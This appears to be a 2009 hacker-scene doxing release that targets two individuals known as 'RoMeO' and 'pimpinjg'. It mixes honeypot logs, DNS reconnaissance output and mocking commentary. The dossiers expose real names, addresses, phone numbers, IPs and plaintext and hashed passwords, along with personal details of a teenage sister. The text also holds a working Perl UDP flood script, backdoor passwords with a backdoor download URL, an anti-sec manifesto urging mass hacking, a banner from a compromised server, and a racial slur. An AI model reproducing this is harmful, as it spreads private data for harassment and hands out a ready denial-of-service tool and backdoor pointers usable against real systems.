0x3aownt root@srv01 [~/downloads/kojoney]# Honeypot Report ----------------------- Date: Tue 23 Jun 2009 05:14:39 AM EDT Log lines: 1173 Log size: 88K /var/log/honeypot.log Authenticated users. Successfull logons --------------------------------------- 2 root Total 2 Unauthenticated users. Failed logons ------------------------------------ 72 root 5 test 5 oracle 2 0x3aownt 1 infosec Total 85 Users successfully authenticateds with publickey ------------------------------------------------ Total 0 Users unsuccessfully authenticateds with publickey -------------------------------------------------- Total 0 Logons with null passwords -------------------------- 8 root 2 0x3aownt 1 infosec Total 11 Logons with or without password ------------------------------- 82 root 5 test 5 oracle 4 0x3aownt 2 infosec Total 98 Number of times a remote shell was opened ----------------------------------------- Total 2 X11 forward requests -------------------- Total 0 Executed different commands --------------------------- 3 w 2 ls 1 quit 1 ps 1 pls -la etc 1 ls -lals 1 ls -la lol 1 ls -la 1 id 1 exit 1 cd /var 1 cd /etc 1 caexit 1 bullshit . Total 17 Number of times the intruder tries to change the terminal window size --------------------------------------------------------------------- Total 0 IP Addresses ------------ 1 123.233.245.226 - 75 conexion(es) 2 91.184.220.239 - 2 conexion(es) 3 64.191.69.101 - 10 conexion(es) Total 3 Sessions opened by humans ------------------------- Typo error filter: Session with id 3 opened by a human // RoMeO 1 human session(s) total Humans detecteds by IP ---------------------- 0 human(s) total Internal Honeypot Errors ------------------------ Total 1 /* After re-imaging and recoving the server, an SSHD honeypot was installed and configured with the backdoor credentials. Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3. */ _______ _______ ________ \ _ \ ___ __\ _ \ \_____ \ / /_\ \\ \/ / /_\ \ / ____/ \ \_/ \> <\ \_/ \/ \ \_____ /__/\_ \\_____ /\_______ \ \/ \/ \/ \/ ___________ __ \__ ___/____ _______ ____ _____/ |_ | | \__ \\_ __ \/ ___\_/ __ \ __\ | | / __ \| | \/ /_/ > ___/| | |____| (____ /__| \___ / \___ >__| \/ /_____/ \/ __________ _____.__.__ .__ \______ \_______ _____/ ____\__| | |__| ____ ____ | ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\ | | | | \( <_> ) | | | |_| | | \/ /_/ > |____| |__| \____/|__| |__|____/__|___| /\___ / \//_____/ 1) RoMeO: ----- Real Name: Faisal Hourani Sister Name: Joud Hourani Country: Saudi Arabia City: Riyadh Previous City: Jeddah Address: King Fahad ST Age: 20 Birthday: April 02 Horoscope: Aries Height: 1.73cm (5.7") Phone Number: +966.509121268 Nickname: RoMeO Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com MSN: romeo@darkmindz.com ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255 Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com Domain Hosting: hr-development.net Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net Skills: _lulz_ Certifications: GSCE English, Math A Level Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth) Fake Names: James Knuth Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com PsyBNC Host: absolute.ownage.net / 72.20.28.205 Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419 Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09) Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr Common Bash Commands: netstat, netstat, netstat @ (Panic Mode) IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org Cars Driving: Golf GTI, Nissan Armada Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life Favorite Movies: House of Wax, The Notebook Favorite Games: Counter-Strike, Doom 3 Favorite Music: Fergie, Chris Brown, Fadel and Yara School: Thamer International School, Jeddah, Saudi Arabia Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom) Studies Course: Software Engineering RoMeO's sister: --------------- Full Name: Jude (Joud) Hourani or Al-Hourani Nationality: Jordanese Speaks: English, French, Arabic and possibly 1 or 2 other languages. Lives in: Jeddah (Saudi Arabia) Birthday: July 14th 1993 Age: 17 Zodiac: Cancer Hair color: Black and Brown (Her worst habit...) Height: 1.68cm ~ 1.72cm Drinks: Sprite, 7up, Pepsi and Cade Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess, Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers, Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty, Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =) TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular, Sleepover club and many other... Quote: "Elordon Awalan" which means "Jordan First!" Sports: Basketball and Tennis Eats: French fries, shrimps and candy!!! Hehehe... :-T Ice-Cream: Chocolate, Lime and Strawberry Candy: HARIBO Colors: White, Black, Red, Pink and Blue Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet and watching movies! Yeeah! :-P Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L! Dream Vacations: USA Disney Land Darkmindz.com on 2007-02-24 - Domain History Registrant: Individual Chilis building Hamra street jeddah, 6277 SA Domain name: DARKMINDZ.COM Administrative Contact: Perlman, Menachem menachem12345@gmail.com Chilis building Hamra street jeddah, 6277 SA +966.509121268 Technical Contact: NOC (Network Operations Center), Servage.net noc@servage.com Im Grund 9 Flensburg, DE 24939 DE +49.46116098358 Fax: +49.46116098359 Darkmindz.com on 2007-04-06 - Domain History Registrant: Individual Kind Fahad ST. Riyadh, sa Domain name: DARKMINDZ.COM Administrative Contact: Haxxor, RoMeO romeo.haxxor@gmail.com King Fahad ST. Riyadh, sa +966.509121268 Technical Contact: NOC (Network Operations Center), Servage.net noc@servage.com Im Grund 9 Flensburg, DE 24939 DE +49.46116098358 Fax: +49.46116098359 Registration Service Provider: Servage.net Hosting, support@servage.net +49 46116098359 (fax) http://www.servage.net/ Darkmindz.com on 2008-01-05 - Domain History Registrant: Individual King Fahad ST. Riyadh, SA Domain name: DARKMINDZ.COM Administrative Contact: Perlman, Menachem romeo.haxxor@gmail.com King Fahad ST. Riyadh, SA +966.509121263 Technical Contact: Perlman, Menachem romeo.haxxor@gmail.com King Fahad ST. Riyadh, SA +966.509121263 Darkmindz.com on 2009-07-31 - Domain History Domain name: darkmindz.com Registrant Contact: NA NA Individual () Fax: King Fahad ST. Riyadh, P SA Administrative Contact: NameCheap.com NameCheap.com NameCheap.com (support@NameCheap.com) +1.6613102107 Fax: +1.5555555555 8939 S. Sepulveda Blvd. #110 - 732 Westchester, CA 90045 US /* Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number. The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came in contradiction with our research, therefore was classified as fake. */ Cybershade.org on 2008-12-23 - Domain History Domain ID:D149271481-LROR Domain Name:CYBERSHADE.ORG Created On:29-Sep-2007 15:21:51 UTC Last Updated On:22-Dec-2008 17:59:31 UTC Expiration Date:29-Sep-2010 15:21:51 UTC Sponsoring Registrar:eNom, Inc. (R39-LROR) Status:OK Registrant ID:15a646b0510 Registrant Name:Cybershade Inc Registrant Street1:123 Cybershade org Registrant Street2: Registrant Street3: Registrant City:Internet Registrant State/Province:DOMAIN Registrant Postal Code:Z1P CD3 Registrant Country:GB Registrant Phone:+44.123567890 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:crawleruk@gmail.com Admin ID:15a646b0510 Admin Name:Cybershade Inc Admin Street1:123 Cybershade org Admin Street2: Admin Street3: Admin City:Internet Admin State/Province:DOMAIN Admin Postal Code:Z1P CD3 Admin Country:GB Admin Phone:+44.123567890 Admin Phone Ext.: Admin FAX: Admin FAX Ext.: Admin Email:crawleruk@gmail.com Tech ID:15a646b0510 Tech Name:Cybershade Inc Tech Street1:123 Cybershade org Tech Street2: Tech Street3: Tech City:Internet Tech State/Province:DOMAIN Tech Postal Code:Z1P CD3 Tech Country:GB Tech Phone:+44.123567890 Tech Phone Ext.: Tech FAX: Tech FAX Ext.: Tech Email:crawleruk@gmail.com Name Server:NS3.HR-DEVELOPMENT.NET Name Server:NS4.HR-DEVELOPMENT.NET // Domain used for their cybershade CMS development. Hello there and welcome to "RoMeOs" one stop web Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com Male, 15 years old Jedah, Saudi-Arabia ref: First Website : http://www.freewebs.com/xromeox/ /* RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address and how you can get other people IP Address. Say, you're really special, aren't you? */ RoMeO: " http://i43.tinypic.com/21317c6.png // root@mercedes ?? [14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/ [14:53:42] RoMeO: now that you've had your fun [14:53:46] <&RoMeO> :) [14:53:53] <&RoMeO> i had the lulz of a life time [14:53:53] feel like explaining integer underflows [14:53:56] <&RoMeO> no .____ ____ ___.____ __________ .___.__ .__ | | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____ | | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \ | |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/ |_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ > \/ \/ \/ \/ \/ \/ \/ \/ PRESENTS [ XSS in wall on SSH 1 / putty ] Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying alot to connect it to the internet but no use! i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas? you can email me at: romeo.haxxor@gmail.com thanks../ Join Date: Jan 2007 Location: Saudi-Arabia Posts: 6 Ref: http://forums.fedoraforum.org/showthread.php?t=146470 /* If he can't install a modem then I don't see how he could hack his way out of a wet paper bag... oh wait... he can't... he's a skiddie! */ Posted 30 May 2008 - 03:13 AM I am glad you like the articles section :) , what about the code base tho? any comments on that maybe? and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main prios to improve are: - Layout - Submit sytem + articles / codes system. all the articles and codes will be reformated to look at its best, etc.... @intimidat0r, I sure will :) ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906 // Your first professional certification I presume? DarkMindZ tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking group underground hackers security experts graphics tutorials learning ref: http://www.urbandictionary.com/define.php?term=DarkMindZ /* Must suck to have two different conflicting personalities. Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY) */ Facebook Lulz ------------- Faisal Hourani SocialInterview.com asked me "Name someone you wish you could date." I answered ''Megan Fox. rawr'' November 15 at 3:56am via Social Interview · Interview Me Faisal Hourani SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?" I answered ''She already checks out everything, everyday. Hi mom :]...'' November 15 at 10:06pm via Social Interview · View Feedback (2)Hide Feedback (2) · Interview Me // We hope she checks this out:] Hai Faisal's mom Faisal Hourani SocialInterview.com asked me "If you could rule any country or place, what would you pick?" I answered: "The world =O" // You ever thought about Economical Crisis ? Faisal Hourani they don't call me romeo for jack :P Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE! You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting See More July 6 at 7:00pm via How dateable are you? · View Feedback (2)Hide Feedback (2) · Take this Quiz // rawr :] lulz “I can’t believe that out of 10,000 sperm, you were the quickest.” ~ Steven Pearl ref: http://nepalimadbulls.wetpaint.com/page/Login+Log // As a skiddie, you are NOT supposed to know how to secure your own code.. (4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL) (5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down') IP address: 77.30.170.77 Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa. Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist] ASN: 25019 ASN Name: SAUDINETSTC-AS IP range connectivity: 5 Registrar (per ASN): RIPE Country (per IP registrar): SA [Saudi Arabia] Country Currency: SAR [Saudi Arabia Riyals] Country IP Range: 77.30.0.0 to 77.31.255.255 Country fraud profile: Normal City (per outside source): Riyadh, Ar Riyad Country (per outside source): SA [Saudi Arabia] Private (internal) IP? No IP address registrar: whois.arin.net Known Proxy? No Link for WHOIS: 77.30.170.77 (23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),( IP address: 89.5.78.7 Reverse DNS: dynamic.dsl.nesma.net.sa. Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist] ASN: 24731 ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA)) IP range connectivity: 1 Registrar (per ASN): RIPE Country (per IP registrar): SA [Saudi Arabia] Country Currency: SAR [Saudi Arabia Riyals] Country IP Range: 89.4.0.0 to 89.5.255.255 Country fraud profile: Normal City (per outside source): Riyadh, Ar Riyad Country (per outside source): SA [Saudi Arabia] Private (internal) IP? No IP address registrar: whois.ripe.net Known Proxy? No Link for WHOIS: 89.5.78.7 ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt ----- darkmindz.com ----- ----------------- Host's addresses: ----------------- darkmindz.com. 5 IN A 69.42.209.54 ------------- Name servers: ------------- ns6.hr-development.net. 5 IN A 69.42.209.51 ns5.hr-development.net. 5 IN A 69.42.209.50 ----------- MX record: ----------- aspmx.l.google.com. 5 IN A 209.85.219.58 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for darkmindz.com on ns6.hr-development.net ... trying zonetransfer for darkmindz.com on ns5.hr-development.net ... ------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.darkmindz.com. 5 IN A 69.42.209.54 mail.darkmindz.com. 5 IN A 69.42.209.54 pop.darkmindz.com. 5 IN A 69.42.209.54 smtp.darkmindz.com. 5 IN A 69.42.209.54 www.darkmindz.com. 5 IN A 69.42.209.54 ------------------------------- darkmindz.com c class netranges: ------------------------------- 69.42.209.0/24 ----- cybershade.org ----- ----------------- Host's addresses: ----------------- cybershade.org. 5 IN A 69.42.209.54 ------------- Name servers: ------------- ns6.hr-development.net. 5 IN A 69.42.209.51 ns5.hr-development.net. 5 IN A 69.42.209.50 ----------- MX record: ----------- mail.cybershade.org. 5 IN A 69.42.209.54 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for cybershade.org on ns6.hr-development.net ... trying zonetransfer for cybershade.org on ns5.hr-development.net ... ------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.cybershade.org. 5 IN A 69.42.209.54 mail.cybershade.org. 5 IN A 69.42.209.54 pop.cybershade.org. 5 IN A 69.42.209.54 smtp.cybershade.org. 5 IN A 69.42.209.54 www.cybershade.org. 5 IN A 69.42.209.54 ------------------------------- cybershade.org c class netranges: ------------------------------- 69.42.209.0/24 2) pimpinjg Real Name: Jason Country: United States State: California Address: Age: 38 Birthday: July 18, 1971 Daughter Name: Dakota Phone Number: Nickname: pimpinjg MSN: pimpinjg@hr-development.net ICQ: 574404127 Skype: pimpinjg Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255 Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net Domain Hosting: hr-development.net Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net Company: hr-development.net Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_ PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206) Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1, Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227 Common Bash Commands: nano, wget :D IRC Friends: RoMeO, garrett Affiliates: thedefaced.org, darkmindz.com Operating System(s): Ubuntu 8.10, Windows Vista - pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg pimpinjg is using modes +iwrxt pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182 pimpinjg is a registered nick pimpinjg on #underground_systems #astalavista &#darkmindz pimpinjg using twofish.securitychat.org SecurityChat.org ircd pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02 pimpinjg End of /WHOIS list. /****************************************************************************************** * pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;) * * * New Mods (added by me) -- +--------------------------------------------------------+ * added proxy shit * removed images for less crap in the logs * added cpanel finder (thx to ackit) * added rfi/lfi finder (thx to ackit) * other shit i cba putting here +--------------------------------------------------------+ * shit to remove -- +--------------------------------------------------------+ * - a bunch of stupid code things (example: echo("$msg"); (wtf... :S)) *********************************************************/ // Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore.. H4ckinab0x.com on 2008-03-12 - Domain History Registrant: project-h4x0r 430 west imperial highway 16 brea, California 92821 United States Domain Name: H4CKINAB0X.COM Created on: 11-Mar-08 Expires on: 11-Mar-09 Last Updated on: 11-Mar-08 Administrative Contact: Gleason, rex pimpinjg4@aol.com project-h4x0r 430 west imperial highway 16 brea, California 92821 United States (714) 529-4264 Fax -- Project-h4x0r.com on 2008-02-16 - Domain History Registrant: project-h4x0r 432 west imperial highway 16 brea, California 92821 United States Domain Name: PROJECT-H4X0R.COM Created on: 13-Feb-08 Expires on: 14-Feb-10 Last Updated on: 14-Feb-08 Administrative Contact: gleason, joshua pimpinjg4@aol.com project-h4x0r 432 west imperial highway 16 brea, California 92821 United States (714) 529-4234 Fax -- Teamhbx.com on 2008-09-05 - Domain History Registrant: h4ckinab0x 234 nigger street nigger, California 11111 United States Domain Name: TEAMHBX.COM Created on: 03-Sep-08 Expires on: 03-Sep-09 Last Updated on: 03-Sep-08 Administrative Contact: nigger, nigger pimpinjg4@aol.com h4ckinab0x 234 nigger street nigger, California 11111 United States 111111111 Fax -- Afraid.org Domains: h4ckinab0x.com (5 hosts in use) website private pimpinjg 192 days ago (01/22/2009) copyandpaste.info (7 hosts in use) website private pimpinjg 66 days ago (05/28/2009) super-syn.net (6 hosts in use) website private pimpinjg 1 day ago (08/02/2009) anti-sec.net (6 hosts in use) website private pimpinjg 2 days ago (07/05/2009) Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q= // It's amazing what u can find on the net.. pimpinjg im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator (wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0 // How's that going for you? Managed to start your "whitehat" security company? lulz pimpinjg Posted 19 October 2008 - 02:05 PM i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a couple warez sites wont release the urls cuz advertising so yeah sup :) ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html // 8 months? Is this a bad joke or a tragedy? pimpinjg is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload till i get a good backup.. ref: http://forum.configserver.com/showthread.php?p=4535 // Did your lover backdoor you? Do you drop the soap on command now? ----- copyandpaste.info ----- ----------------- Host's addresses: ----------------- copyandpaste.info. 5 IN A 76.175.20.182 ------------- Name servers: ------------- ns2.afraid.org. 5 IN A 66.252.5.14 ns4.afraid.org. 5 IN A 67.18.179.15 ns3.afraid.org. 5 IN A 72.20.15.62 ns1.afraid.org. 5 IN A 67.19.72.206 ----------- MX record: ----------- aspmx.l.google.com. 5 IN A 209.85.219.26 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for copyandpaste.info on ns2.afraid.org ... trying zonetransfer for copyandpaste.info on ns3.afraid.org ... trying zonetransfer for copyandpaste.info on ns4.afraid.org ... trying zonetransfer for copyandpaste.info on ns1.afraid.org ... ------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.copyandpaste.info. 5 IN A 67.19.72.202 irc.copyandpaste.info. 5 IN A 94.102.58.212 mail.copyandpaste.info. 5 IN A 67.19.72.202 www.copyandpaste.info. 5 IN CNAME copyandpaste.info. copyandpaste.info. 5 IN A 76.175.20.182 ------------------------------- copyandpaste.info c class netranges: ------------------------------- 67.19.72.0/24 76.175.20.0/24 94.102.58.0/24 WebHostingTalk Rumors --------------------- * 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day * 6/9/2009 7:38 am Astalavista got hacked * 5/10/2009 9:15 am Post Your Server Uptime ref: http://www.webhostingtalk.com/profile/HRDev%20Jason // HR-Development.net the Anti-DDOS Specialist ? aka anti-sec? HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff? ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877 // Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert? Old 06-09-2009, 08:38 AM HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 looks like the same hacker group striked again? pastebin.com/m592e1f1c i wonder what his obsession is with astalavista staff? and from the looks of it he has a 0day grsecurity exploit too, its getting really bad ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267 // Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on.. HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 This thread needs life! && bump Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD [root@mercedes ~]# uptime 07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01 [root@mercedes ~]# ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336 romeo@mercedes~$ // romeo.copyandpaste.info

                 __   .__                        
_____     ____ _/  |_ |__|  ______  ____   ____  
\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\ 
 / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___ 
(____  /|___|  /|__|  |__|/____  > \___  >\___  >
     \/      \/ # rm -rf /     \/      \/     \/Movement
 
						~ Fuck full-disclosure
                                                ~ Fuck the security industry
						~ Keep 0days private
						~ Hack everyone you can and then hack some more
 


http://i43.tinypic.com/21317c6.png // [root@mercedes ~]# 

/* It is clear that you and RoMeO was sharing the same hr-dev server with the following domains:

evilzone.ws
h4ckinab0x.com
hr-development.net
phone.addresses.com
phone.theyellowpages.com
aaasoda.com
beyond-comparison.com
hotglowneon.com
yourkicksonline.com
yourkicksonline.net
blitzcraze.com
blitzdownloads.com
bloohacks.com
bootforfun.com
crypticgamers.com
crypticgamers.net
darkmindz.com
furiogaming.net
godlymods.com
h3mod.com
h4ckinab0x.com
hackordie.net
halostrike.com
iexpl0it.net
mods4hire.com
mortonnetworks.com
oinfam0uso.com
pagewizzstudio.com
phylumstudios.com
samcraft.com
scionbot.com
snayke.com
softmodding.net
teamunix.org
theconsolejunkies.com
undergr0undhackers.com
vbcoderz.com
1nesolution.com
bootforfun.com
crypticgamers.net
cybershade.org
darkmindz.com
furiogaming.com
gotmovies.net
h3mod.com
halostrike.com
keytraderz.com
samcraft.com
sounddistrict.com
theconsolejunkies.com

*/



#!/usr/bin/perl
# udp
#flooder.pl coded by pimpinjg

print q{
====================================================                                                                             
=						   =
=                                        Coded By  =
=                                                  =
=                                       pimpinjg   =
=                                                  =
=                                team  h4ckinab0x  =
=                                                  =
=                                h4ckinab0x.com    =
=                                                  =
====================================================
};

use io::socket;

print "Host: ";
chop ($host = );
print "Port: ";
chop ($port = );

{
$sock = IO::Socket::INET->new (
                PeerAddr => $host,
                PeerPort => $port,
                Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
}
packets:
while (1) {
$size = rand() * 200 * 2000;
print ("$host:$port packet size: $size\n");
send($sock, 0, $size);
}

ref: http://www.studentshangout.com/topic/99723-udp-flodder/

// anti-ddos specialist @ hr-dev.. 


_______         _______  ________  
\   _  \ ___  __\   _  \ \_____  \ 
/  /_\  \\  \/  /  /_\  \  _(__  < 
\  \_/   \>    <\  \_/   \/       \
 \_____  /__/\_ \\_____  /______  /
       \/      \/      \/       \/ 
                                                            __             
  ______  _  ______ _____     ____   ____      ____   _____/  |_           
 /  _ \ \/ \/ /    \\__  \   / ___\_/ __ \    /    \_/ __ \   __\   ______ 
(  <_> )     /   |  \/ __ \_/ /_/  >  ___/   |   |  \  ___/|  |    /_____/ 
 \____/ \/\_/|___|  (____  /\___  / \___  > /\___|  /\___  >__|            
                  \/     \//_____/      \/  \/    \/     \/                
__________                _________              
\______   \_______  ____ /   _____/ ____   ____  
 |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 |    |     |  | \(  <_> )        \  ___/\  \___ 
 |____|     |__|   \____/_______  /\___  >\___  >
                                \/     \/     \/ 



/* 
Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
*/

This is a private computer system which is restricted to authorized individuals.
Actual or attempted unauthorized use of this computer system will result in criminal
and/or civil prosecution.  This system is owned by Vitalspeeds Corporation of Wisconsin.
To purchase an account please visit us at http://www.vitalspeeds.com.

FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007


                              Welcome
                                to
  ___ ___ __ __          __                             __
 |   |   |__|  |_.---.-.|  |.-----.-----.-----.-----.--|  |.-----.
 |   |   |  |   _|  _  ||  ||__ --|  _  |  -__|  -__|  _  ||__ --|
  \_____/|__|____|___._||__||_____|   __|_____|_____|_____||_____|
                                  |__|



 By entering or accessing this server, you hereby agree to the Acceptable
      Use Policy and any other terms and conditions listed on our website.

     Type 'vhosts' for a list of the virtual hosts that can be used on
           this system. You can view this again by typing 'motd'.

               Support can be obtained in #vitalspeeds on EFnet.

                       http://www.vitalspeeds.com/


Perm - All support requests should go through our Ticket system @
https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .

Commands: vhosts, BitchX
NOTE: Eggdrop/BNCS use ports over 35000.

April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of 
service. Check your welcome email for user info etc. 

                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          | // romeo.copyandpaste.info
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]

 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.33, 0.26, 0.24
yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 18:12   still logged in
yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 17:00 - 17:39  (00:38)
katsst           ttyp1    cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37  (00:30)
dark             ftp      modemcable089.1  Sun Jun 28 15:45 - 15:45  (00:00)
smash            ttyp1    89.30.147.8      Sun Jun 28 15:30 - 15:50  (00:19)
[root@velocity:~]# w
 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.43, 0.28, 0.25
USER             TTY      FROM              LOGIN@  IDLE WHAT
romeo            p0       :ttyp2:S.0       Thu11PM     - irssi -h absolute.ownage.net
